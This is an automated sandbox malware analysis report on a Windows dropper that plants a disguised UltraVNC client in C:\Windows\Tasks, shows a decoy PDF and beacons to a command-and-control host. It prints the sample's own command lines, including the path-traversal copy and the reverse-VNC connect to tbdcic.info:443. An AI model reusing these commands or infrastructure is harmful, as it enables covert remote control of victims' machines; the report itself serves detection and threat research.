
Windows Analysis Report
7q551ugrWe.exe

Overview

General Information

Sample name: 7q551ugrWe.exe
renamed because original name is a hash value
Original sample name: c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4.exe
Analysis ID: 1579876
MD5: d61940626fad051067bfd16f2ab4e657
SHA1: cceaeda73fca724016bac0c9cb000fcd4ca1e523
SHA256: c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
Tags: exe, tbdcic-info, user-JAMESWT_MHT

Detection

UltraVNC
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • 7q551ugrWe.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\7q551ugrWe.exe" MD5: D61940626FAD051067BFD16F2AB4E657)
    • cmd.exe (PID: 6496 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7132 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6728 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 5520 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7124 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3852 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1760,i,4170063215735319094,17128991866469409438,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 1496 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 6632 cmdline: taskkill /f /im sync_browser.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 5432 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7440 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 7556 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 7736 cmdline: C:\Windows\Tasks\sync_browser.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 7772 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • sync_browser.exe (PID: 6084 cmdline: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 7368 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 4676 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6160 cmdline: timeout /t 42 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
No configs have been found
Source | Rule | Description | Author
C:\Windows\Tasks\sync_browser.exe | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\WPSela.LSZr7V | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
C:\Windows\Tasks\WPSela.LSZr7V | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security

Source | Rule | Description | Author
00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
Source | Rule | Description | Author
23.2.sync_browser.exe.7ff6dc0c0000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
18.0.sync_browser.exe.7ff6dc0c0000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
18.2.sync_browser.exe.7ff6dc0c0000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security
23.0.sync_browser.exe.7ff6dc0c0000.0.unpack | JoeSecurity_UltraVNC | Yara detected UltraVNC Hacktool | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7736, ProcessName: sync_browser.exe
Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7132, TargetFilename: C:\Windows\Tasks\conhost.exe
Source: Process started | Author: Bhabesh Raj | Data: Command: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_VPANJC -connect tbdcic.info:443, ProcessId: 6084, ProcessName: sync_browser.exe
Source: Process started | Author: Christian Burkard (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 6984, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 6496, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\7q551ugrWe.exe", ParentImage: C:\Users\user\Desktop\7q551ugrWe.exe, ParentProcessId: 6984, ParentProcessName: 7q551ugrWe.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 6496, ProcessName: cmd.exe
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: C:\Windows\Tasks\sync_browser.exe, CommandLine: C:\Windows\Tasks\sync_browser.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\sync_browser.exe, NewProcessName: C:\Windows\Tasks\sync_browser.exe, OriginalFileName: C:\Windows\Tasks\sync_browser.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7132, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\sync_browser.exe, ProcessId: 7736, ProcessName: sync_browser.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T13:31:29.416752+0100 | 2035893 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49995 | 194.190.152.201 | 443 | TCP

AV Detection

Source: 7q551ugrWe.exe | ReversingLabs: Detection: 23%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.6% probability
Source: 7q551ugrWe.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: conhost.pdbUGP source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
Source: Binary string: conhost.pdb source: 7q551ugrWe.exe, 00000000.00000003.2107015272.000000000266C000.00000004.00000020.00020000.00000000.sdmp, Nfe70s.UFVVkM.2.dr, Nfe70s.UFVVkM.0.dr, conhost.exe.6.dr
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,18_2_00007FF6DC0E6DD1
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,18_2_00007FF6DC0C5910
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,18_2_00007FF6DC0EC210
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,18_2_00007FF6DC17A228
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0E6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6DC0E6DD1
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0C5910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6DC0C5910
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0EC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6DC0EC210
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC17A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6DC17A228
Source: Joe Sandbox View | ASN Name: RSHB-ASRU RSHB-ASRU
Source: Network traffic | Suricata IDS: 2035893 - Severity 1 - ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon : 192.168.2.5:49995 -> 194.190.152.201:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0CC810 recv,recv,recv,recv,18_2_00007FF6DC0CC810
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | DNS traffic detected: DNS query: tbdcic.info
Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 77EC63BDA74BD0D0E0426DC8F80085060.13.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://forum.uvnc.com
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.0000000002679000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000285D000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 7q551ugrWe.exe, 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, 7q551ugrWe.exe, 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000000.2195868188.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288199566.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://www.uvnc.com
Source: 7q551ugrWe.exe, 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000012.00000000.2195788801.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2288042504.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2276194423.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe.6.dr, WPSela.LSZr7V.2.dr, WPSela.LSZr7V.0.dr | String found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
Source: 2D85F72862B55C4EADD9E66E06947F3D0.13.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\7q551ugrWe.exe | Code function: 0_2_00408630 SetWindowsHookExW 00000002,Function_00008602,00000000,00000000,0_2_00408630
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,18_2_00007FF6DC0C1DD0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_00007FF6DC0F13A0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0C1DD0 OpenClipboard,EmptyClipboard,CloseClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,GlobalAlloc,CloseClipboard,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,23_2_00007FF6DC0C1DD0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0F13A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,23_2_00007FF6DC0F13A0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0C1AE0 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,18_2_00007FF6DC0C1AE0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0C3770 GetDC,CreateCompatibleDC,CreateCompatibleBitmap,GetDIBits,GetDIBits,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,CreateCompatibleBitmap,DeleteObject,timeGetTime,SelectObject,BitBlt,SelectObject,timeGetTime,timeGetTime,GetPixel,timeGetTime,ReleaseDC,DeleteDC,DeleteObject,18_2_00007FF6DC0C3770
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC111550 GetAsyncKeyState,MapVirtualKeyA,GetAsyncKeyState,18_2_00007FF6DC111550
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,18_2_00007FF6DC0D74C0
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 23_2_00007FF6DC0D74C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,23_2_00007FF6DC0D74C0
Source: C:\Windows\Tasks\sync_browser.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0D2E40 OpenSCManagerA,OpenServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,18_2_00007FF6DC0D2E40
Source: C:\Windows\Tasks\sync_browser.exe | Code function: 18_2_00007FF6DC0CD560 GetModuleFileNameA,FindWindowA,GetWindowThreadProcessId,OpenProcess,OpenProcessToken,CreateProcessAsUserA,GetLastError,CloseHandle,CloseHandle,CloseHandle,CloseHandle,18_2_00007FF6DC0CD560
